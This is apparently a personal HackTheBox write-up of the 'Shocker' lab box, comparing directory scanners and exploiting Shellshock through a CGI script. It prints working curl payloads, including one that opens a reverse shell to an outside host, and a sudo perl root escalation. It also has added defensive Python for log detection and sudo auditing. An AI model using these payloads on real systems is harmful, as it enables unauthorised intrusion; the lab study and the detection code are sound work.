Shocker

Shocker was not technically next in line; Beep was. I have started Beep but I’ll return to that later. I didn’t know what this was but I guessed from the name.

Ports

HTTP and SSH on a non-standard port: 2222.

HTTP

On the front page of the webserver is a picture of a bug with a hammer and the phrase “don’t bug me”. I was guessing at this point that this was probably shellshock. Which it is. This then, is mostly an exercise in enumeration.

I’ve been liking dirsearch but on this box it let me down; observe:

┌──(root💀kali)-[/opt/htb/shocker]
└─# python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.56/cgi-bin -w /usr/share/seclists/Discovery/Web-Content/common.txt -e sh
/opt/dirsearch/thirdparty/requests/__init__.py:91: RequestsDependencyWarning: urllib3 (1.26.2) or chardet (4.0.0) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "

  _|. _ _  _  _  _ _|_    v0.4.1                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                         
                                                                                                                                
Extensions: sh | HTTP method: GET | Threads: 30 | Wordlist size: 4681
Error Log: /opt/dirsearch/logs/errors-21-03-14_00-02-19.log
Target: http://10.10.10.56/cgi-bin/                                                                                             
Output File: /opt/dirsearch/reports/10.10.10.56/cgi-bin_21-03-14_00-02-19.txt

[00:02:19] Starting: 
        
Task Completed    

Nothing found, and it’s the same whether I use /cgi-bin/ or /cgi-bin without the trailing slash. What about gobuster, which was my old favourite before dirsearch?

┌──(root💀kali)-[/opt/htb/shocker]
└─# gobuster dir  -u http://10.10.10.56/cgi-bin/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x sh
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              sh
[+] Timeout:                 10s
===============================================================
2021/03/14 00:04:30 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 298]
/.htaccess            (Status: 403) [Size: 303]
/.htpasswd            (Status: 403) [Size: 303]
/.hta.sh              (Status: 403) [Size: 301]
/.htaccess.sh         (Status: 403) [Size: 306]
/.htpasswd.sh         (Status: 403) [Size: 306]
/user.sh              (Status: 200) [Size: 118]
                                               
===============================================================
2021/03/14 00:08:20 Finished
===============================================================

Found it (user.sh) no problem. Very disappointing dirsearch. I’ve heard good things about feroxbuster lately; let’s try that:

┌──(root💀kali)-[/opt/htb/shocker]
└─# feroxbuster -u http://10.10.10.56/cgi-bin/ -x sh -w /usr/share/seclists/Discovery/Web-Content/common.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.2.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.10.56/cgi-bin/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.2.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 💲  Extensions            │ [sh]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200        7l       17w        0c http://10.10.10.56/cgi-bin/user.sh
403       11l       32w      303c http://10.10.10.56/cgi-bin/.htaccess
403       11l       32w      306c http://10.10.10.56/cgi-bin/.htaccess.sh
403       11l       32w      298c http://10.10.10.56/cgi-bin/.hta
403       11l       32w      301c http://10.10.10.56/cgi-bin/.hta.sh
403       11l       32w      303c http://10.10.10.56/cgi-bin/.htpasswd
403       11l       32w      306c http://10.10.10.56/cgi-bin/.htpasswd.sh
[####################] - 46s     9362/9362    0s      found:7       errors:0      
[####################] - 46s     9362/9362    202/s   http://10.10.10.56/cgi-bin/

Not only did it find it, but it was noticeably quicker than gobuster. A new king has been crowned.

Exploitation

Is trivial:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
  http://10.10.10.56/cgi-bin/user.sh

To show it’s working, and then a shell via:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.10/1234 0>&1'" \
  http://10.10.10.56/cgi-bin/user.sh
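
The detection side of the same request, as an added example that is not part of the original post: a small Python scanner over Apache combined-format access log lines. Apache's CGI module copies request headers into the script's environment as HTTP_* variables, and a vulnerable bash parses any exported value that begins with "() {" as a function definition and runs what follows it, so the User-Agent and Referer fields of the access log are exactly where the prefix shows up. The log lines are constructed for the example (the first payload is the one used above); the regexes, field names and the SAMPLE_LOG constant are my own, not anything from the box or the tools in the writeup.

```python
import re

# Apache "combined" log format:
#   host ident user [time] "METHOD path proto" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Bash only treats an exported value as a function definition when it starts
# with "() {".  The pattern is kept deliberately loose (optional whitespace)
# so that trivially reformatted variants such as "(){" are still caught.
SHELLSHOCK_RE = re.compile(r'^\s*\(\)\s*\{')

# Fields of a combined-format line that mod_cgi copies verbatim into the
# script environment (HTTP_USER_AGENT, HTTP_REFERER).  Other client-controlled
# headers such as Cookie also become HTTP_* variables but are not written to
# this log format, which is a real blind spot of access-log-only detection.
ENV_FIELDS = ("ua", "referer")


def scan_access_log(lines):
    """Return one finding per request that carries a Shellshock-style prefix
    in a logged header field.  Lines that are not combined-format are skipped."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue  # a real deployment should count unparsable lines, not drop them
        for field in ENV_FIELDS:
            value = m.group(field)
            if SHELLSHOCK_RE.match(value):
                findings.append({
                    "line": lineno,
                    "ip": m.group("ip"),
                    "path": m.group("path"),
                    "status": int(m.group("status")),
                    "field": field,
                    "value": value,
                    # Flag whether the target was a CGI script; a hit against a
                    # static file is still worth alerting on (spraying).
                    "cgi": m.group("path").startswith("/cgi-bin/"),
                })
    return findings


# Constructed sample lines (assumed, not captured from the box).
SAMPLE_LOG = [
    '10.10.14.10 - - [14/Mar/2021:00:08:20 +0000] "GET /cgi-bin/.htaccess.sh HTTP/1.1" 403 306 "-" "gobuster/3.1.0"',
    '10.10.14.10 - - [14/Mar/2021:00:09:30 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"',
    '10.10.14.10 - - [14/Mar/2021:00:10:05 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; echo; echo; /bin/bash -c \'cat /etc/passwd\'"',
    '10.10.14.10 - - [14/Mar/2021:00:11:00 +0000] "GET /index.html HTTP/1.1" 200 137 "() { :;}; /usr/bin/id" "curl/7.74.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} -> {f['path']} [{f['status']}] "
              f"via {f['field']}: {f['value']!r}")
```

Run as a script it reports the third and fourth sample lines and ignores the directory-enumeration and normal-browser requests. The enumeration traffic (dozens of 403s against /cgi-bin/ from one client in a few minutes) is a separate signal worth a rate-based rule; this block only looks for the function-definition prefix.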

Root

GTFOBins from HTB? They don’t do that anymore:

┌──(root💀kali)-[/opt/htb/shocker]
└─# nc -nvlp 1234                     
listening on [any] 1234 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.56] 37280
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/home/shelly$ sudo -u root /usr/bin/perl -e 'exec "/bin/sh";'
sudo -u root /usr/bin/perl -e 'exec "/bin/sh";'
cd /root
cat root.txt
# flag goes here
id;hostname
uid=0(root) gid=0(root) groups=0(root)
Shocker
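
The audit view of the same sudo rule, as an added example that is not part of the original post: a Python helper that parses the "may run the following commands" section of `sudo -l` output in the format shown above and flags rules that let a user run, as root, a program that can hand back a shell. The SHELL_CAPABLE set is an illustrative assumption (a production check would take its list from a maintained source such as GTFOBins); the sample input is the output shown above plus one constructed benign rule.

```python
import re
from os.path import basename

# One "(runas) [TAG: ...] cmd, cmd" rule line as printed by `sudo -l`.
RULE_RE = re.compile(
    r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$'
)

# Assumed, illustrative set of programs that can spawn a shell or give
# arbitrary file read/write when run as root.  Not exhaustive.
SHELL_CAPABLE = {
    "perl", "python", "python2", "python3", "ruby", "php", "node",
    "bash", "sh", "dash", "zsh", "vim", "vi", "nano", "less", "more",
    "find", "awk", "env", "tar", "zip",
}


def parse_sudo_l(output):
    """Parse the rule lines that follow 'may run the following commands'."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        # "(user : group)" -> keep only the run-as user part
        runas = m.group("runas").split(":")[0].strip()
        for cmd in m.group("cmds").split(","):
            rules.append({
                "runas": runas,
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd.strip(),
            })
    return rules


def audit_rules(rules):
    """Return the rules an auditor should review: root-capable and shell-capable."""
    findings = []
    for r in rules:
        if r["runas"] not in ("root", "ALL"):
            continue
        prog = basename(r["command"].split(" ", 1)[0])
        if r["command"] == "ALL" or prog in SHELL_CAPABLE:
            reason = ("grants an unrestricted root shell" if r["command"] == "ALL"
                      else f"{prog} can spawn a shell or read/write files as root")
            findings.append({
                **r,
                "reason": reason,
                # No password prompt means no second factor and no audit pause.
                "severity": "high" if r["nopasswd"] else "medium",
            })
    return findings


# The sudo -l output from the box above, plus one constructed benign rule.
SAMPLE_SUDO_L = """\
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/id
"""

if __name__ == "__main__":
    for f in audit_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[{f['severity']}] ({f['runas']}) {f['command']}: {f['reason']}")
```

The fix for a rule like this is not to block perl but to grant the specific script or command that was actually needed, with its arguments, and to keep NOPASSWD off anything that can interpret code.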

I also did h4cked and Badbyte from THM yesterday but I don’t have anything to say about them. Proxychains nmap was mildly interesting.